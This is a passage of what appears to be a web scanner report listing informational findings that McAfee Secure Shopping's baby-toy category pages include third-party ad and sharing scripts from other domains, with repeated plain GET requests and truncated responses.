Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:34 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:34 GMT
Content-Length: 65791

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Baby Toys at McAfee Secure Shopping - Search, Discover & Com
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.95. http://secureshopping.mcafee.com/browse/baby/toys/activity-toys/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/toys/activity-toys/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/toys/activity-toys/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:34 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:34 GMT
Content-Length: 59876

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Activity Toys at McAfee Secure Shopping - Search, Discover &
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.96. http://secureshopping.mcafee.com/browse/baby/toys/bath-toys/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/toys/bath-toys/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/toys/bath-toys/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:38 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:38 GMT
Content-Length: 64776

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Bath Toys at McAfee Secure Shopping - Search, Discover & Com
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.97. http://secureshopping.mcafee.com/browse/baby/toys/learning-toys/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/toys/learning-toys/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/toys/learning-toys/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:38 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:38 GMT
Content-Length: 55302

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Learning Toys at McAfee Secure Shopping - Search, Discover &
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.98. http://secureshopping.mcafee.com/browse/baby/toys/mobiles/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/toys/mobiles/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/toys/mobiles/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:42 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:42 GMT
Content-Length: 62603

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Mobiles at McAfee Secure Shopping - Search, Discover & Compa
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.99. http://secureshopping.mcafee.com/browse/baby/toys/music-toys/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/toys/music-toys/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/toys/music-toys/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:43 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:43 GMT
Content-Length: 58806

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Music Toys at McAfee Secure Shopping - Search, Discover & Co
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.100. http://secureshopping.mcafee.com/browse/baby/toys/play-gyms-mats/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/toys/play-gyms-mats/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/toys/play-gyms-mats/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:44 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:44 GMT
Content-Length: 61442

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Play Gyms & Mats at McAfee Secure Shopping - Search, Discove
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.101. http://secureshopping.mcafee.com/browse/baby/toys/pull-along-toys/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/toys/pull-along-toys/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/toys/pull-along-toys/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:45 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:45 GMT
Content-Length: 51013

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Pull Along Toys at McAfee Secure Shopping - Search, Discover &am
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.102. http://secureshopping.mcafee.com/browse/baby/toys/rattles/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/toys/rattles/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/toys/rattles/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:48 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:48 GMT
Content-Length: 55210

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Rattles at McAfee Secure Shopping - Search, Discover & Compa
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.103. http://secureshopping.mcafee.com/browse/baby/toys/stuffed-toys/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/toys/stuffed-toys/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/toys/stuffed-toys/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:49 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:49 GMT
Content-Length: 50416

